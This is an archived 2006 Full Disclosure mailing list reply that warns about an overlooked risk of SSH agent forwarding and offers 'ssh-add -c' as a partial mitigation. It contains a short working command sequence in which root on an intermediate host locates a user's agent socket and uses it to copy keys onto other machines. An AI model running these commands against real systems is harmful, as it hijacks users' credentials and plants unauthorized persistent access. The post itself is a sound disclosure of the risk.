Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Re: Tech Tip: An Illustrated Guide to SSH Agent Forwarding
From: Andrew McGill <andrew2005 () ledge co za>
Date: Fri, 24 Feb 2006 13:53:52 +0200 (SAST)

On Wednesday Feb 22, 2006 around 1:37pm, Steve Friedl wrote,

Hello all,

While trying to convince a customer that he really needs to get away
from password auth on his SSH servers, I ended up diving in to make
some detailed notes on how key agents and forwarding work. The outcome
of this was a new Tech Tip which explains it in some detail:

  Unixwiz.net Tech Tip: An Illustrated Guide to SSH Agent Forwarding

I hope some find this helpful.


Here's something you missed in the "Cons" section of agent 

  lala () local:       ssh-add 
  lala () local:         (enter key)
  lala () local:       ssh -A customer

    lala () customer:  ssh remote

      lala () remote:  sleep 86400

And while you are sleeping:
  root () customer does this:
        export SSH_AUTH_SOCK=`find /tmp -user lala -name 'agent.*' | head -1`   
        ssh-copy-id lala () remote 
        ssh-copy-id lala () local
        ssh-copy-id lala () othercustomer
        ssh-copy-id lala () lalaland

(Oops) (that's a lot easier than subverting ssh to insert 
something evil into the stream that will hack into the remote)

If there are untrusted machines involved you may prefer this:

  ssh-add -c

Note that ssh-agent does not identify the origin of requests for 
authentication (a bug?), so its confirmation is not fail-safe.


Leading Edge Business Solutions              +27 11 656 0360
Linux Training, Software and Networking  http://ledge.co.za/

Linux - laai niks anders
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]